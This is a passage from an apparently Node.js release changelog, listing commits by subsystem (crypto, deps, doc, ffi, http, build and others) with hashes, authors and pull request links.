<li>[<a href="https://github.com/nodejs/node/commit/58717685a1"><code>58717685a1</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: support loading private keys through STORE loaders (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63949" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63949/hovercard">#63949</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44b940ee8c"><code>44b940ee8c</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.125 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64746" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64746/hovercard">#64746</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c1e4f7365e"><code>c1e4f7365e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>lib</strong>: add perfetto support (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64565/hovercard">#64565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11c2f9c642"><code>11c2f9c642</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>module</strong>: implement <code>Symbol.dispose</code> in <code>ModuleHooks</code> (Remco Haszing) <a href="https://github.com/nodejs/node/pull/63928" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63928/hovercard">#63928</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a646319f61"><code>a646319f61</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>test_runner</strong>: add support for <code>--test-coverage-include-all</code> (avivkeller) <a href="https://github.com/nodejs/node/pull/64830" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64830/hovercard">#64830</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/a2d3f891d3"><code>a2d3f891d3</code></a>] - <strong>async_hooks</strong>: use validateBoolean for trackPromises (Soul Lee) <a href="https://github.com/nodejs/node/pull/64731" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64731/hovercard">#64731</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d7266cdd99"><code>d7266cdd99</code></a>] - <strong>benchmark</strong>: fix calibrate-n option handling (Luan Muniz) <a href="https://github.com/nodejs/node/pull/64146" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64146/hovercard">#64146</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2e64293e3f"><code>2e64293e3f</code></a>] - <strong>buffer</strong>: use Clamp conversion in Blob slice (Donghoon Kang) <a href="https://github.com/nodejs/node/pull/64739" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64739/hovercard">#64739</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5fda0958bd"><code>5fda0958bd</code></a>] - <strong>buffer</strong>: validate copyArrayBuffer offsets against buffer length (Ilia Alshanetsky) <a href="https://github.com/nodejs/node/pull/63904" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63904/hovercard">#63904</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5298db40f9"><code>5298db40f9</code></a>] - <strong>build</strong>: run perfetto build and test on GHA (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64721" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64721/hovercard">#64721</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e3eac7cef9"><code>e3eac7cef9</code></a>] - <strong>build</strong>: fix v8_use_perfetto source scraping (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64721" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64721/hovercard">#64721</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ab5f076d7f"><code>ab5f076d7f</code></a>] - <strong>build</strong>: bump rustc requirement to &gt;=1.86 (Renegade334) <a href="https://github.com/nodejs/node/pull/64543" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64543/hovercard">#64543</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df608e061f"><code>df608e061f</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>build</strong>: perfetto-sdk (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64565/hovercard">#64565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/74928adc46"><code>74928adc46</code></a>] - <strong>build,tools</strong>: fix shared library cross-compile (Kirill Saied) <a href="https://github.com/nodejs/node/pull/63963" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63963/hovercard">#63963</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58717685a1"><code>58717685a1</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: support loading private keys through STORE loaders (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63949" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63949/hovercard">#63949</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/58d13b6f3d"><code>58d13b6f3d</code></a>] - <strong>crypto</strong>: preserve OpenSSL errors from KDF failures (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64776" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64776/hovercard">#64776</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/478a719cb5"><code>478a719cb5</code></a>] - <strong>crypto</strong>: fix Argon2 bypassing FIPS mode (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64776" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64776/hovercard">#64776</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44b940ee8c"><code>44b940ee8c</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.125 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64746" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64746/hovercard">#64746</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fde85237c7"><code>fde85237c7</code></a>] - <strong>crypto</strong>: clarify missing cipher error (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64852" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64852/hovercard">#64852</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c604d8846d"><code>c604d8846d</code></a>] - <strong>crypto</strong>: reuse X509 issuer result (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64852" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64852/hovercard">#64852</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c68c7d0112"><code>c68c7d0112</code></a>] - <strong>crypto</strong>: validate key generation options (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64852" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64852/hovercard">#64852</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c36bb1d017"><code>c36bb1d017</code></a>] - <strong>crypto</strong>: fix Argon2 validation errors (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64852" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64852/hovercard">#64852</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f61408bb27"><code>f61408bb27</code></a>] - <strong>crypto</strong>: handle XOF output allocation failure (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64851" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64851/hovercard">#64851</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2b4053d046"><code>2b4053d046</code></a>] - <strong>crypto</strong>: initialize KeyObjectData mutex eagerly (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64851" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64851/hovercard">#64851</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b7b2adf44"><code>4b7b2adf44</code></a>] - <strong>crypto</strong>: handle DH operation failures (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64851" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64851/hovercard">#64851</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/12170c3753"><code>12170c3753</code></a>] - <strong>crypto</strong>: use user-facing error for output encoding changes (Archkon) <a href="https://github.com/nodejs/node/pull/64692" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64692/hovercard">#64692</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/474f06d550"><code>474f06d550</code></a>] - <strong>debugger</strong>: preserve overlapping CDP request state (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64467" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64467/hovercard">#64467</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/718cbe9497"><code>718cbe9497</code></a>] - <strong>deps</strong>: upgrade npm to 11.19.0 (npm team) <a href="https://github.com/nodejs/node/pull/64883" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64883/hovercard">#64883</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/657c6154b3"><code>657c6154b3</code></a>] - <strong>deps</strong>: update ngtcp2 to 1.25.0 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64944" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64944/hovercard">#64944</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75a1fbeff9"><code>75a1fbeff9</code></a>] - <strong>deps</strong>: update nghttp3 to 1.18.0 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64943" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64943/hovercard">#64943</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/07d7cb7cd8"><code>07d7cb7cd8</code></a>] - <strong>deps</strong>: update minimatch to 10.2.6 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64945" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64945/hovercard">#64945</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f7d56359f1"><code>f7d56359f1</code></a>] - <strong>deps</strong>: update simdjson to 4.6.6 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64942" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64942/hovercard">#64942</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8b06457cfb"><code>8b06457cfb</code></a>] - <strong>deps</strong>: update acorn to 8.18.0 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64941" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64941/hovercard">#64941</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5919d01525"><code>5919d01525</code></a>] - <strong>deps</strong>: update googletest to 1b6f64d659944658a4c685b7bd9f04c1c3b8a39b (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64940" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64940/hovercard">#64940</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4a87ad6cff"><code>4a87ad6cff</code></a>] - <strong>deps</strong>: update nghttp2 to 1.70.0 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64939" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64939/hovercard">#64939</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c96d76a7c8"><code>c96d76a7c8</code></a>] - <strong>deps</strong>: update zlib to 1.3.2.1-motley-42c2f19 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64744" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64744/hovercard">#64744</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2b59984c0f"><code>2b59984c0f</code></a>] - <strong>deps</strong>: V8: backport 5177b10891e6 (avivkeller) <a href="https://github.com/nodejs/node/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64631/hovercard">#64631</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b839af91da"><code>b839af91da</code></a>] - <strong>deps</strong>: update ada to 4.0.0 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64790" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64790/hovercard">#64790</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/70dedef942"><code>70dedef942</code></a>] - <strong>deps</strong>: update sqlite to 3.53.4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64745" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64745/hovercard">#64745</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7bc4c171f5"><code>7bc4c171f5</code></a>] - <strong>deps</strong>: update Rust crates for V8 14.6.202.34-node.26 (Renegade334) <a href="https://github.com/nodejs/node/pull/64543" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64543/hovercard">#64543</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/308c6b2ac3"><code>308c6b2ac3</code></a>] - <strong>deps</strong>: V8: backport 7d9b7e03141d (Manish Goregaokar) <a href="https://github.com/nodejs/node/pull/64543" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64543/hovercard">#64543</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8eeae28e88"><code>8eeae28e88</code></a>] - <strong>deps</strong>: V8: backport c4d06ba586f3 (liujiahui) <a href="https://github.com/nodejs/node/pull/63731" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63731/hovercard">#63731</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bbd6fc58c4"><code>bbd6fc58c4</code></a>] - <strong>diagnostics_channel</strong>: grow native channel storage (Stephen Belanger) <a href="https://github.com/nodejs/node/pull/64497" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64497/hovercard">#64497</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce8b292955"><code>ce8b292955</code></a>] - <strong>doc</strong>: fix grammar and punctuation in dgram documentation (Kamal Rawal) <a href="https://github.com/nodejs/node/pull/64957" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64957/hovercard">#64957</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1a413a60cf"><code>1a413a60cf</code></a>] - <strong>doc</strong>: fix grammar and editorial issues in addons documentation (Kamal Rawal) <a href="https://github.com/nodejs/node/pull/64952" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64952/hovercard">#64952</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/63fbd59e64"><code>63fbd59e64</code></a>] - <strong>doc</strong>: formalize fn/name as part of TestOptions API (Christopher Hiller) <a href="https://github.com/nodejs/node/pull/64946" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64946/hovercard">#64946</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b263b0bca1"><code>b263b0bca1</code></a>] - <strong>doc</strong>: remove references to <code>ca</code>/<code>crl</code> as per-context QuicSession options (René) <a href="https://github.com/nodejs/node/pull/64769" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64769/hovercard">#64769</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f37de14b27"><code>f37de14b27</code></a>] - <strong>doc</strong>: fix typo in maintaining-dependencies.md (greenhead) <a href="https://github.com/nodejs/node/pull/64896" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64896/hovercard">#64896</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/16cb77cdc8"><code>16cb77cdc8</code></a>] - <strong>doc</strong>: add RafaelGSS as last security release stewards (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/64843" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64843/hovercard">#64843</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/335c28cd17"><code>335c28cd17</code></a>] - <strong>doc</strong>: fix typos in documentation (greenhead) <a href="https://github.com/nodejs/node/pull/64900" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64900/hovercard">#64900</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d4bed8ca39"><code>d4bed8ca39</code></a>] - <strong>doc</strong>: fix missing references in doc type map (Tim Perry) <a href="https://github.com/nodejs/node/pull/64872" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64872/hovercard">#64872</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e71d09d5f1"><code>e71d09d5f1</code></a>] - <strong>doc</strong>: improve TestContext hook descriptions (Kamal Rawal) <a href="https://github.com/nodejs/node/pull/64899" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64899/hovercard">#64899</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7089bd9ae4"><code>7089bd9ae4</code></a>] - <strong>doc</strong>: add missing float32/float64 FFI type names (Soul Lee) <a href="https://github.com/nodejs/node/pull/64874" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64874/hovercard">#64874</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8d3ae0830e"><code>8d3ae0830e</code></a>] - <strong>doc</strong>: document stream.isDestroyed() (YspritanHyzygy) <a href="https://github.com/nodejs/node/pull/64789" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64789/hovercard">#64789</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a757e62af7"><code>a757e62af7</code></a>] - <strong>doc</strong>: add contributing detail for git Signed-off-by trailer (Mike McCready) <a href="https://github.com/nodejs/node/pull/64862" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64862/hovercard">#64862</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3e840f43ed"><code>3e840f43ed</code></a>] - <strong>doc</strong>: mark config-file as release candidate (Marco Ippolito) <a href="https://github.com/nodejs/node/pull/64516" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64516/hovercard">#64516</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/70cd5df810"><code>70cd5df810</code></a>] - <strong>doc</strong>: fix duplicated word in test snapshot docs (Kamal Rawal) <a href="https://github.com/nodejs/node/pull/64837" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64837/hovercard">#64837</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d5f36c7adc"><code>d5f36c7adc</code></a>] - <strong>doc</strong>: remove obsolete cctest node.gyp instructions (Soul Lee) <a href="https://github.com/nodejs/node/pull/64814" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64814/hovercard">#64814</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a0bf29ea09"><code>a0bf29ea09</code></a>] - <strong>doc</strong>: report proper return type on url.format (Brian Muenzenmeyer) <a href="https://github.com/nodejs/node/pull/64806" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64806/hovercard">#64806</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e655e42085"><code>e655e42085</code></a>] - <strong>doc</strong>: use ffi.suffix for library paths in examples (Junsoo Ha) <a href="https://github.com/nodejs/node/pull/64805" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64805/hovercard">#64805</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e0f0830dbc"><code>e0f0830dbc</code></a>] - <strong>doc</strong>: document --permission-audit audit mode behavior (Adrián Estrada) <a href="https://github.com/nodejs/node/pull/64791" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64791/hovercard">#64791</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/efbede6de0"><code>efbede6de0</code></a>] - <strong>doc</strong>: clarify tlsSocket.authorized on resumption (soreavis) <a href="https://github.com/nodejs/node/pull/64584" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64584/hovercard">#64584</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/db95655c4a"><code>db95655c4a</code></a>] - <strong>doc</strong>: stabilize --disable-warning (Jean Michelet) <a href="https://github.com/nodejs/node/pull/64742" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64742/hovercard">#64742</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a8367200be"><code>a8367200be</code></a>] - <strong>doc</strong>: add MDN links for explicit resource management in fs (lluisemper) <a href="https://github.com/nodejs/node/pull/59557" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/59557/hovercard">#59557</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1c09165c2e"><code>1c09165c2e</code></a>] - <strong>doc</strong>: mention constructor check in deepStrictEqual (Sumit Kumar Das) <a href="https://github.com/nodejs/node/pull/62010" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62010/hovercard">#62010</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/29709324e0"><code>29709324e0</code></a>] - <strong>doc</strong>: update technical priorities (Jacob Smith) <a href="https://github.com/nodejs/node/pull/64505" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64505/hovercard">#64505</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/522a28e648"><code>522a28e648</code></a>] - <strong>doc</strong>: deprecation add more codemod (Augustin Mauroy) <a href="https://github.com/nodejs/node/pull/63175" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63175/hovercard">#63175</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c40aaa6539"><code>c40aaa6539</code></a>] - <strong>doc</strong>: run license-builder (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63918" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63918/hovercard">#63918</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/428e9bc50f"><code>428e9bc50f</code></a>] - <strong>ffi</strong>: fix crash in refCallback and unrefCallback (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64881" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64881/hovercard">#64881</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/33912103e7"><code>33912103e7</code></a>] - <strong>ffi</strong>: reject fast calls after library close (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64860" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64860/hovercard">#64860</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b348ed7f92"><code>b348ed7f92</code></a>] - <strong>ffi</strong>: validate fast 32-bit integer argument ranges (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64691" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64691/hovercard">#64691</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/48f4cfb480"><code>48f4cfb480</code></a>] - <strong>ffi</strong>: fix optimized buffer conversions (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64639" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64639/hovercard">#64639</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/109ffcd4f3"><code>109ffcd4f3</code></a>] - <strong>ffi</strong>: preserve link register in ppc64 trampoline (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64792" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64792/hovercard">#64792</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aa3f168b31"><code>aa3f168b31</code></a>] - <strong>ffi</strong>: preserve strings during reentrant calls (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64551" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64551/hovercard">#64551</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ca60942f38"><code>ca60942f38</code></a>] - <strong>ffi</strong>: preserve uint8 semantics for bool fast calls (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64527/hovercard">#64527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0fb1d2bd65"><code>0fb1d2bd65</code></a>] - <strong>ffi</strong>: validate fast integer argument ranges (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64614" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64614/hovercard">#64614</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b250b40b30"><code>b250b40b30</code></a>] - <strong>fs</strong>: key glob matcher cache by platform (Archkon) <a href="https://github.com/nodejs/node/pull/64571" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64571/hovercard">#64571</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e26891ec6a"><code>e26891ec6a</code></a>] - <strong>http</strong>: fix writableFinished and 'finish' after write errors (Tim Perry) <a href="https://github.com/nodejs/node/pull/64847" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64847/hovercard">#64847</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dfc192fdfb"><code>dfc192fdfb</code></a>] - <strong>http</strong>: avoid aborting IncomingMessage signal on normal close (Archkon) <a href="https://github.com/nodejs/node/pull/64392" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64392/hovercard">#64392</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6794441c85"><code>6794441c85</code></a>] - <strong>http</strong>: guard invalid timeout values in checkConnections (Efe Karasakal) <a href="https://github.com/nodejs/node/pull/64506" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64506/hovercard">#64506</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6879aa4aa8"><code>6879aa4aa8</code></a>] - <strong>http</strong>: propagate highWaterMark to ClientRequest OutgoingMessage (trivenay) <a href="https://github.com/nodejs/node/pull/64653" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64653/hovercard">#64653</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/72448a82f4"><code>72448a82f4</code></a>] - <strong>http2</strong>: avoid copying the options in respond() (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64265" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64265/hovercard">#64265</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f6692da576"><code>f6692da576</code></a>] - <strong>http2</strong>: avoid per-write closures in kWriteGeneric (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64265" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64265/hovercard">#64265</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3ed37153f8"><code>3ed37153f8</code></a>] - <strong>http2</strong>: reduce per-request allocations (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64265" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64265/hovercard">#64265</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bce92debba"><code>bce92debba</code></a>] - <em><strong>Revert</strong></em> "<strong>http2</strong>: avoid per-write closures in kWriteGeneric" (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64663" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64663/hovercard">#64663</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5d5dd74a1"><code>b5d5dd74a1</code></a>] - <em><strong>Revert</strong></em> "<strong>http2</strong>: avoid copying the options in respond()" (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64663" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64663/hovercard">#64663</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19b9c14d60"><code>19b9c14d60</code></a>] - <strong>lib</strong>: fix AbortSignal.any() observed-composite leak (Paul Bouchon) <a href="https://github.com/nodejs/node/pull/64481" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64481/hovercard">#64481</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d3cada57c2"><code>d3cada57c2</code></a>] - <strong>lib</strong>: fix typo in comment in _http_client.js (agape1225) <a href="https://github.com/nodejs/node/pull/64729" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64729/hovercard">#64729</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c1e4f7365e"><code>c1e4f7365e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>lib</strong>: add perfetto support (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64565/hovercard">#64565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6c2157522d"><code>6c2157522d</code></a>] - <strong>loader</strong>: enforce path normalization before lookup (Maël Nison) <a href="https://github.com/nodejs/node/pull/63917" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63917/hovercard">#63917</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/31522c41a7"><code>31522c41a7</code></a>] - <strong>meta</strong>: bump actions/stale from 10.3.0 to 11.0.0 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64935" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64935/hovercard">#64935</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/88c8b8ef54"><code>88c8b8ef54</code></a>] - <strong>meta</strong>: bump github/codeql-action/analyze from 4.36.2 to 4.37.3 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64934" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64934/hovercard">#64934</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9dcd759a84"><code>9dcd759a84</code></a>] - <strong>meta</strong>: bump github/codeql-action/autobuild from 4.36.2 to 4.37.3 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64933" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64933/hovercard">#64933</a></li>
